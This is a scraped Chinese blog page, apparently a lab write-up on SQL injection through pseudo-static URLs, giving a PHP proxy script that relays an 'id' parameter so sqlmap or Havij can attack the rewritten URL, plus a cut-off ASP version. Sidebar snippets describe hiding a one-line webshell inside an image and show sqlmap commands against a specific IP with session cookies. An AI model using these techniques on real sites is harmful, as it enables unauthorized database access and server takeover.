在图片注入(伪静态注入)习题情况下得到的知识集合

最新推荐文章于 2022-02-09 18:00:00 发布
最新推荐文章于 2022-02-09 18:00:00 发布
阅读量2.6k 收藏 5
点赞数 2
文章标签: 图片注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zezai3010/article/details/78797944
版权


一、伪静态注入

(一)伪静态定义:

为了实时的显示一些信息。或者还想运用动态脚本解决一些问题。不能用静态的方式来展示网站内容。伪静态只是改变了URL的表现形式,实际上还是动态页面

例:http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/

http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/?id=1

显示的界面是一样的。也即是静态和动态一样,即是伪静态。

(二)伪静态注入总结:

参考:http://www.cnblogs.com/jsq16/p/5942003.html

一:中转注入法

1.通过http://www.xxx.com/news.php?id=1做了伪静态之后就成这样了

http://www.xxx.com/news.php/id/1.html

2.测试步骤:

中转注入的php代码:inject.php

<?php

set_time_limit(0);

$id=$_GET["id"];

$id=str_replace(” “,”%20″,$id);

$id=str_replace(“=”,”%3D”,$id);

//$url = "http://www.xxx.com/news.php/id/$id.html";

$url = "http://www.xxx.com/news.php/id/$id.html";

//echo $url;

 

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "$url");

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_HEADER, 0);

 

$output = curl_exec($ch);

curl_close($ch);

print_r($output);

?>

3.本地环境搭建PHP,然后访问http://127.0.0.1/inject.php?id=1

通过sqlmap或者havj可以跑注入漏洞。

附录ASP中转代码:

<strong><font style="font-size: 12pt"><code id="code1"><%

JmdcwName=request("id")

JmStr=JmdcwName

JmStr=URLEncoding(JmStr)

JMUrl="http://192.168.235.7:8808/ad/blog/"  //实际上要请求的网址

JMUrl=JMUrl & JmStr&".html"    //拼接url

response.write JMUrl&JmStr    //我这里故意输出url来看

'JmRef="http://127.0.0.1/6kbbs/bank.asp"

JmCok="

最低0.47元/天 解锁文章
VIS-Wing
关注
php图片伪静态
09-01
本程序主要原理就是利用了地址重写实现了图片伪静态 .htaccess伪静态规则文件 topic.php主程序 images图片存放路径
伪静态图片防盗链
qcy_10086的博客
09-18 941
伪静态 从形式上看是一个静态地址,实际上还是访问的动态地址, 比如:访问:http://www.abc.com/news-sport-id123.html 实际上是:http://www.abc.com/news.php?type=sprot&id=123; 作用:主要是利于seo,静态页面的方式,比较容易被搜索引擎给搜集。 1、实现原理: 使用apac he的rewrite机制。
伪静态文件
代码搬运工
01-29 602
伪静态文件 静态文件:真实存在的、内容不变的文件。指WebRoot下面的 html, js, css, jpg 这些文件,浏览器会认为,这些文件的内容是不会改变的,因而有可能会缓存在本地。 伪静态文件:看后缀像是一个普通的静态文件,但实际上内容却是由 Servlet生成的。 例如: 创建一个 Servlet,伪装成一个静态文件。http://127.0.0.1:8080/mid0401/test.html package my; import java.io.IOException; impo.
图片url 伪静态 php,php使动态URL标签链接转成伪静态
weixin_30141859的博客
03-10 255
写个标题那么别扭,意思就是,网站用了伪静态后,后台可以调出符合伪静态的URL。比如本来是chapter?id=1137&page=12要伪静态成chapter_1137_12.htm而且还要考虑有没有分页的参数,如:chapter?id=1137要伪静态成chapter_1137.htm我对参数还是敏感了,写了一个:$str = 'chapter?id=1137&page=12';...
图片url 伪静态 php,thinkphp5系列之URL伪静态(生成优雅的URL)
weixin_31289735的博客
03-10 456
thinkphp5系列之URL伪静态(生成优雅的URL)thinkphp5系列之URL伪静态(生成优雅的URL)伪静态是相对真实静态来讲的,通常我们为了增强搜索引擎的友好面,都将文章内容生成静态页面,但是有的朋友为了实时的显示一些信息。或者还想运用动态脚本解决一些问题。不能用静态的方式来展示网站内容。但是这就损失了对搜索引擎的友好面。怎么样在两者之间找个中间方法呢,这就产生了伪静态技术...URL...
java代码-Java5-20练习题
07-16
静态导入允许你在不指定类名的情况下直接引用类的静态成员,减少了代码中的冗余。 8. **匿名内部类(Anonymous Inner Classes)** 在Java 5之前,创建匿名内部类时必须提供完整的类定义。Java 5之后,可以简化...
java代码-Java5-22练习题
07-14
Java编程语言是IT领域广泛应用的一种高级程序设计语言,以其跨平台、面向对象的特性而闻名。...通过解决这些练习题,你将能巩固对Java 5的理解,提升编程技能,并为后续的Java版本学习打下坚实基础。
JDBC编程 J275练习题、Java基础知识
11-09
在SL275.doc和JDBC编程.ppt中可能包含了JDBC的具体练习题和解决方案,Java275.ppt和J2SE 5.0中的新特性.ppt则可能详细介绍了Java基础知识和Java 5.0版本的更新内容。通过学习这些资料,开发者可以深入理解JDBC编程,...
图片url 伪静态 php,php url伪静态化的实现方法详解
weixin_42136826的博客
03-10 522
//将url转换成静态urlfunction url_rewrite($file, $params = array (), $html = "", $rewrite = true) {if ($rewrite) { //开发阶段是不要rewrite,所在开发的时候,把$rewrite = false$url = ($file == 'index') ? '' : '/' . $file;if (!...
Python 图片注入js
fang_mu_mu的博客
06-30 2778
Python 关于图片注入js问题 前段时间618呢,某宝上入手了几本python的书籍,对于一个PHPer来说,Python简直是打开了我新世界的大门啊!而只用python写过爬虫的我,就在端午假最后一天晚上,在《Python黑客攻防入门》P.91上翻到一篇好玩的东西——图片文件黑客攻击!(不是打广告哦) 基本原理 把一张bmp图片用python二进制文件模式(r+b)打开, 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进
脚本后门注入图片程序
^_^-Beluga, ^_^-Stefli
04-23 1753
@echo off echo. echo         ********************************** echo         脚本后门注入图片程序 By 我非我 echo         mail:wofeiwo1987@yahoo.com.cn echo         QQ:309088292 echo         ***********************
一张图片也能SQL注入
蚁景网安学院
02-09 4043
点击"蓝字"关注,获取更多技术内容前言最近在复盘SQL注入,看到有一个trick挺有意思的,这个trick主要利用后端程序会将文件exif信息插入数据库进行SQL注入因此本篇文章会从题目解...
怎么把代码放图片里面进行注入_代码审计之XSS漏洞
weixin_39569753的博客
12-03 1456
跨站脚本攻击(Cross Site Scriptings)有两种情况,一种是通过外部输入然后直接在浏览器端触发,即反射型XSS;还有一种则是先把利用代码保存在数据库或文件中,当Web程序读取利用代码并输出在页面上时触发漏洞,也就是存储型XSS。XSS攻击在浏览器端触发,大家对其危害认识往往停留在可以窃取cookie、修改页面钓鱼,等等。用一句话来说明该漏洞的危害就是:前端页面能做的事它都能做。挖掘...
脚本后门注入图片新方法<图片+一句话***>
weixin_33923148的博客
12-07 548
创建一个 shell.php 的一句话***,通过 window 下 copy 命令 copy 123.png+shell.php 123.png 重新生成一个 123.png 的图片。上传到服务服务器上,直接拿菜刀连。 转载于:https://blog.51cto.com/zhpfbk/1880430...
怎么把代码放图片里面进行注入_揭秘代码分层后的新世界
weixin_39719472的博客
11-29 409
引导语大家好,我是文贺,一名工作五年的一线 Java 开发,主要擅长 Java 源码、DDD(领域驱动设计)、业务中台框架的落地,本次我们分享的主题名称叫做:代码分层后的新世界,其核心思想就是和大家一起讨论下目前比较通用的分层架构,讨论一下其由来、优点和简单的代码落地实践。2 主要内容2.1 代码不分层,迟早要崩溃。14 年参加工作的时候,写了一年的 MVC 架构,大概的后端工程结构(我们说的是后...
伪静态注入
cnbird's blog
06-01 5316
伪静态注入
【渗透测试】关于伪静态页面
ssrf
12-23 1214
目录一 、phpstudy配置伪静态1 检测Apache是否支持mod_rewrite2 让apache服务器支持.htaccess3 建立.htaccess 文件 一 、phpstudy配置伪静态 1 检测Apache是否支持mod_rewrite 通过php提供的phpinfo()函数查看环境配置,通过Ctrl+F查找到Loaded Modules,其中列出了所有apache2handler已经开启的模块,如果里面包括mod_rewrite,则已经支持,不再需要继续设置。 如果没有开启mod_rew
【漏洞挖掘】——25、XXE靶机实践测试
Fly_鹏程万里
03-08 8560
Haboob团队根据https://www.exploit-db.com/docs/45374发表的论文"XML外部实体注入-解释和利用"制作了这个虚拟机以利用私有网络中的漏洞,我们希望你喜欢这个挑战!
伪静态sql注入sqlmap
最新发布
09-20
伪静态SQL注入是指在伪静态页面中通过注入恶意的SQL语句来获取或修改数据库中的信息。与真实的静态页面不同,伪静态页面是通过服务器脚本将动态内容转化为静态的HTML页面。在注入防御方面,PDO(PHP Data Object)预处理是一种常用的技术。PDO是PHP的一个拓展模块,它通过预处理语句直接将不符合规范的变量处理掉,从而有效地防止了SQL注入攻击。 至于使用sqlmap进行伪静态SQL注入测试,您可以使用以下命令来查询所有数据库名称: ``` sqlmap.py -u "http://47.103.94.191:8001/front/getNewsByKeyword.php?key=1'and 1=1" --cookie="PHPSESSID=6nsukkbv4l6lpb6vm9ltgvmp83;ECS_ID=fe88eb728f88fc0220c58960aedda4c9eea2d307;ECS[visit_times]=1;ECS[history]=32;ECS[display]=grid" -dbs ``` 您可以使用以下命令来查询news库中的表名: ``` sqlmap.py -u "http://47.103.94.191:8001/front/getNewsByKeyword.php?key=1'and 1=1" --cookie="PHPSESSID=6nsukkbv4l6lpb6vm9ltgvmp83;ECS_ID=fe88eb728f88fc0220c58960aedda4c9eea2d307;ECS[visit_times]=1;ECS[history]=32;ECS[display]=grid" -D "news" --tables ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值